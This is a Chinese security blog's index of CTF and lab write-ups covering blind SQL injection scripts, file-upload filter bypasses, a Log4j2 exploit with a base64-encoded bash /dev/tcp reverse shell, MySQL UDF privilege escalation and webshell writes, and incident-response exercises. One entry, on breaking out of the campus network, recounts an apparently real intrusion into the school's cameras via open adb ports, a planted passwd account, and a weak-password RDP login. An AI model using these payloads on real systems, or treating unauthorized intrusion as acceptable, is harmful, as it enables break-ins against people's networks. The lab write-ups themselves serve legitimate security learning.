Web | Neko's SecBlog

ctfshowWP

今后有关ctfshow的解题都会在这里 ctfshow web8 sql注入，不过过滤了很多东西，常见的and,union空格但依旧可以通过 GET /index.php?id=2/**/or/**/true# GET /index.php?id=2/**/or/**/false# 来判断真假来注入需要使用盲注，函数为ascii,原理就是比对 or/**/ascii(substr(database()from/**/1/**/for/**/1))=ascii(substr(database()from/**/1/**/for/**/1))%23 截取当前数据库的第一个字符，比对第一个字符，返回很多文章，证明是true,成功查询当前数据库的代码 import requests def check_id(id_value, position): # position 递增 url = f"https://df8032cd-0662-449d-bb7d-7ccd15eb9c62.challenge.ctf.show/index.php?id=-1/**/or/**/ascii(substr(database()from/**/{position}/**/for/**/1))={id_value}#" response = requests.get(url, verify=False) # 长度大于 403 ASCII if len(response.content) > 403: ascii_value = chr(id_value) return ascii_value return None def main(): inp = "" position = 1 # 查询位置 while position <= 5: for i in range(0, 128): # 遍历ascii result = check_id(i, position) if result is not None: inp += result print(f"Position: {position}, ASCII: {result}") position += 1 break print(f"Final input: {inp}") if __name__ == "__main__": main() 查询到数据库名称为web8 ...

php文件上传靶场-upload_labs[未完成]

既在比赛中吃亏的时候就决定要再把这个靶场刷一边，当我还在寻思怎么绕过验证的时候队友就已经拿到webshell了，这个差距简直无法接受 pass-01 简单的js前端验证约等于没有过 pass-02 在源代码中关键点在与 if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) $_FILES这个超级数组是用于处理文件上传的信息的，其中包括客户端通过post传输的上传文件的文件信息，其中type这个字段是用于判断文件的类型，在流量包中体现为Content-Type:字段将content-type修改为image/jpeg发包上传，成功 pass-03 在pass03的代码中他设置了一个黑名单并做了判定 $file_ext = strrchr($file_name, '.'); $deny_ext = array('.asp','.aspx','.php','.jsp'); if(!in_array($file_ext, $deny_ext)) 过滤掉了常见的脚本后缀，看似天衣无缝，但这个靶场使用的是apache的后端，而它其中存在一个配置文件httpd.conf 之中的AddType application/x-httpd-php .php .php3 .phtml语句用于告诉服务器将什么后缀的文件交予php解释器处理，这里除了php还有php3,phtml，这没有在代码的过滤器中 pass-04 这次过滤很严格 $deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf"); 但还是在httpd.conf中，存在这样一条配置 AllowOverride All的作用是允许.htaccess 文件覆盖服务器的全局配置，这导致我们可以上传这个文件覆盖掉服务器配置文件，使得自定义的后缀被服务器的php解析 <IfModule mime_module> AddType application/x-httpd-php .boom </IfModule> 局限性：apache才存在，AllowOverride All默认关闭 pass-05 代码如下 $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess"); 发现了什么？过滤了hta，但就php没有过滤大小写 pass-06 第六题的代码中少了去除空格的一行代码 $file_ext = trim($file_ext); //首尾去空而过滤中却没有，也就是可以构造php 来pass pass-07 这次提示直接说过滤了所有后缀 $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess"); 本次靶机使用的是windows，在windows中有一个特性，在后缀后面再加点这个点会被系统丢掉利用这特性在后缀加点就可绕过 pass-08 pass8与前面的代码相比，少了一个::$DATA的过滤，其利用 NTFS 文件系统中的一个特性，替代数据流 (Alternate Data Streams, ADS) ...

校园网突破

校园网突破简单来说就是内网渗透，除了突破学校网络来上网，还有就是看看能不能拿下更多的设备出网权限获取学校的设置是教学区可以使用校园网出网，而宿舍虽然有校园网的选项但是并不能出网，根据之前的上个学期的经验学校的宿舍网络与校园网络是相通的也就是说最简单的方法就是找到一台教学区的设备作为跳板出网，这并不难，去年学校装了不少监控开着adb端口我已经报告了好几次了——你既然不修，那我就来用随即选择一台幸运设备连接可以看到是一个标准shell，nmap扫描结果显示开放ssh端口，这就好办了，修改passwd文件手动写入一个用户在用passwd命令修改密码这样就拿到了ssh权限，可以做代理了速度尚可，但是非常不稳定通过一个rdp弱口令进入了一台服务器，在user下发现了个好玩的 s 原以为是已经被人拿下了但这不像供 h 管应 t 理链 t 员 p ： : a / d / m * i * n * . * * * 密 . 码 * ： * * * * . * * * * / x x x / D e f a u l t . a s p x ...

log4j2复现

log4j工具利用简单复现 log4j2 java应用常见的开源日志库， jndi JND，一个JAVA的接口用于，能从指定的外部服务器获取并加载对象简单利用，拉一个靶场 docker pull vulfocus/log4j2-rce-2021-12-09 docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09 工具https://github.com/welk1n/JNDI-Injection-Exploit 通过mvn clean package -DskipTests编译后在target中能找到jar文件反弹shell的常用命令是bash -i >& /dev/tcp/172.17.0.1/2345 0>&1这样的一般会用bash -c "bash -i >& /dev/tcp/172.17.0.1/2345 0>&1"来拿到shell,但这里不行需要用到https://ares-x.com/tools/runtime-exec来编码反弹shell 得到bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTcuMC4xLzIzNDUgMD4mMQ==}|{base64,-d}|{bash,-i} 工具的使用为 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] -c跟上执行的命令，-A跟上攻击机的ip地址，运行后为这里jdk7和jdk8的payload在vulfocus靶场都用不了需要使用中间也就是whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):这个条件的payload 即可

[玄机]vulntarget-n linux tomcat 勒索应急响应

vulntarget-n 分析攻击事件是如何发生的，请给出攻击画像解密勒索恢复原来的index.jsp页面，恢复正常的web服务找到隐藏在其中的3个flag 入侵事件，先备份命令历史 cat .bash_history >> bash_hi.bak 第一个flag flag{vulntarget_very_G00d} 但没够继续翻日志跟踪log可以看到服务器这里是tomcat的服务端位于/opt/tomcat/root这里在备份index后又新建了一个，接着跟踪在根目录创建了一个.vulntarget文件夹，用python生成了一对密钥对，然后拷贝了公钥到根目录用py脚本进行了加密，跟踪来到生成密钥的位置可以看到私钥没有删除，根据log文件信息也只做了rsa,那只需要写一个脚本解密就好，然后截至到这里遇到了卡住我的第一个点 flag解密是正常的，但相对较长的index与404文件无法正常解密，后续是使用python解决的 import base64 import os import rsa # 定义目标后缀 TARGET_EXTENSIONS = ['.vulntarget'] def load_private_key(key_path): """加载RSA私钥""" with open(key_path, mode="rb") as file: priv_key = file.read() return rsa.PrivateKey.load_pkcs1(priv_key) def rsa_decrypt(file_name, priv_key): """对文件进行RSA解密""" with open(file_name, mode="rb") as file: encoded_data = file.read() try:xin xi data = base64.b64decode(encoded_data) except Exception as e: print(f"Base64 decode error for file {file_name}: {e}") return # 打印解密前的数据块信息 print(f"Decrypting file: {file_name}") print(f"Encoded data length: {len(encoded_data)}") print(f"Decoded data length: {len(data)}") # 存储解密后的数据块 res = [] # 设置每次解密的数据块大小为128字节 chunk_size = 128 # 128大小关键flag{https://github.com/crow821/vulntarget} for i in range(0, len(data), chunk_size): chunk = data[i:i + chunk_size] print(f"Decrypting chunk {i // chunk_size}: {chunk.hex()[:60]}...") try: decrypted_chunk = rsa.decrypt(chunk, priv_key) res.append(decrypted_chunk) except rsa.pkcs1.DecryptionError as e: # 如果解密过程中出现错误，则打印错误信息并跳过当前数据块 print(f"Decryption failed for chunk {i // chunk_size}: {e}") continue # 跳过失败的块 decrypted_data = b''.join(res) os.remove(file_name) # 去掉后缀 new_file_name = file_name.replace(".vulntarget", "") with open(new_file_name, mode="wb") as file: file.write(decrypted_data) print(f"[+] Decrypt success: {new_file_name}") def decrypt_files_in_directory(directory_path, priv_key): """递归解密目录下的所有文件""" for root, _, files in os.walk(directory_path): for file in files: file_path = os.path.join(root, file) if any(file_path.endswith(ext) for ext in TARGET_EXTENSIONS): rsa_decrypt(file_path, priv_key) def main(target_path, key_path): """主函数""" priv_key = load_private_key(key_path) if os.path.isdir(target_path): decrypt_files_in_directory(target_path, priv_key) else: if any(target_path.endswith(ext) for ext in TARGET_EXTENSIONS): rsa_decrypt(target_path, priv_key) if __name__ == '__main__': target_path = './' # 替换为实际路径 key_path = './key.pem' # 替换为私钥路径 main(target_path, key_path) 使用了分块解密 ...

mysql UDF提权详解

mysql UDF提权上次做题的时候遇到了各UDF提权没有做出来，遂补习，建立在已经获得基础权限需要提权到mysql的情况下权限获取简单罗列一些，这次主要研究UDF提权的手段。 1.sqlmap -os-shell 2.手工dumpfile 3.NDAY webshell 知道网站根目录有mysqlroot权限 secure_file_priv 为空，无限制 secure_file_priv可以通过show global variables like '%secure_file_priv%';来查询，NULL不允许写入 V s a e r c i u a r b e l _ e f _ i n l a e m _ e p r i v V a l u e SELECT '<?php phpinfo(); ?>' INTO DUMPFILE '/www/wwwroot/192.168.56.102_8083/phpinfo.php'; 手动UDF UDF（User Defined Function）顾名思义用户自定义函数，一般形式是用c语言编写的动态链接库，windows为dll，linux为so，所以不准确的说UDF是一种C代码执行 ...

[玄机] 日志分析-mysql应急响应

考的是对mysql下渗透方式的熟悉程度 1.黑客第一次写入的shell flag{关键字符串} 2.黑客反弹shell的ip flag{ip} 3.黑客提权文件的完整路径 md5 flag{md5} 注 /xxx/xxx/xxx/xxx/xxx.xx 4.黑客获取的权限 flag{whoami后的值} 黑客反弹shell的ip mysql的渗透我能想到的方法无非是注入，和弱口令接管，先找到日志 root@xuanji:~# find / -name mysql /etc/init.d/mysql /etc/mysql /usr/bin/mysql /usr/lib/perl5/auto/DBD/mysql /usr/lib/perl5/DBD/mysql /usr/lib/mysql /usr/share/mysql /usr/share/php5/mysql /var/lib/mysql /var/lib/mysql/mysql /var/lib/php5/modules/apache2/enabled_by_maint/mysql /var/lib/php5/modules/cli/enabled_by_maint/mysql /var/lib/php5/modules/registry/mysql /var/log/mysql cat以后值得注意的内容是 sh: 1: curl: not found --2023-08-01 02:14:11-- http://192.168.100.13:771/ Connecting to 192.168.100.13:771... connected. HTTP request sent, awaiting response... 200 No headers, assuming HTTP/0.9 Length: unspecified Saving to: 'index.html' 0K 2.46 =2.0s 2023-08-01 02:14:13 (2.46 B/s) - 'index.html' saved [5] /tmp/1.sh: line 1: --2023-08-01: command not found /tmp/1.sh: line 2: Connecting: command not found /tmp/1.sh: line 3: HTTP: command not found /tmp/1.sh: line 4: Length:: command not found /tmp/1.sh: line 5: Saving: command not found /tmp/1.sh: line 7: 0K: command not found /tmp/1.sh: line 9: syntax error near unexpected token `(' /tmp/1.sh: line 9: `2023-08-01 02:16:35 (5.01 MB/s) - '1.sh' saved [43/43]' 服务器从192.168.100.13下载了一个脚本并运行了cat一下脚本 ...

R3PHP wp

R3PHP 如果没有题解我绝对想不到原题： <?php error_reporting(0); if(strpos($_REQUEST['url'],"http")===0){ $opts = array( 'http'=>array( 'method'=>"GET", 'header'=>$_REQUEST['header']) ); $context = stream_context_create($opts); $file = file_get_contents($_REQUEST['url'], false, $context); // echo $file; # no show for u }else{ echo "hacker!"; } highlight_file(__FILE__); ?> 应该是出题人的人说 First, by reading the code, you can know that it is a blind ssrf, and then you can also pass the header header After casually entering a url, I found that 404 is phpstudy, and I can tell that it is a small skin panel of linux. The code of phpstudy Panel, audit found that all requests go through port 8090: ...

NSSCTF [SWPUCTF 2022 新生赛]funny_web

登入挺迷惑的账户是NSS，密码看了别人题解才知道不难看出，重点代码是 if ($num != '12345') { if (intval($num) == '12345') { echo $FLAG; } 这里的判定用了intval函数，其常见与强制类型转换，转换时会忽略小数点，同时它的第二个参数可以缺省，也就是说这个函数能完成自动转化对应关系为 0开头8进制 0x开头16进制否则十进制传入12345.123即可

sql注入的学习[未完待续]

sql注入作为经典中的经典基础中的基础，也是入门必然接触的东西，不得不深入好好品鉴一番（ sql注入本质上是数据sql代码没有过滤用户内容的错误拼接类似代码 $id = $_GET['id']; $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 这种，直接通过GET传参就可以控制sql语句简单分类整数注入字符形注入报错注入布尔盲注时间盲注堆叠注入注入方法与shell写入 order判断与联合查询简单写了一个php和一个表 CREATE TABLE users ( id INT AUTO_INCREMENT PRIMARY KEY, username VARCHAR(255) NOT NULL, email VARCHAR(255) NOT NULL UNIQUE ); <?php if(isset($_GET['id'])){ $host = 'localhost'; $dbname = 'testsql'; $user = 'root'; $pass = 'b409797a01eaf960'; $conn = mysqli_connect($host, $user,$pass, $dbname); mysqli_select_db($conn,$dbname); $id = $_GET['id']; $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; $result = mysqli_query($conn, $sql); $row = mysqli_fetch_array($result); echo $row['id']; echo $row['email']; echo $row['username']; } ?> order by+union select在我看来是最简单的一种注入方法，目前体感也相对少见，union直译可为联合，在sql中作为将两个查询语句粘连在一起例如 ...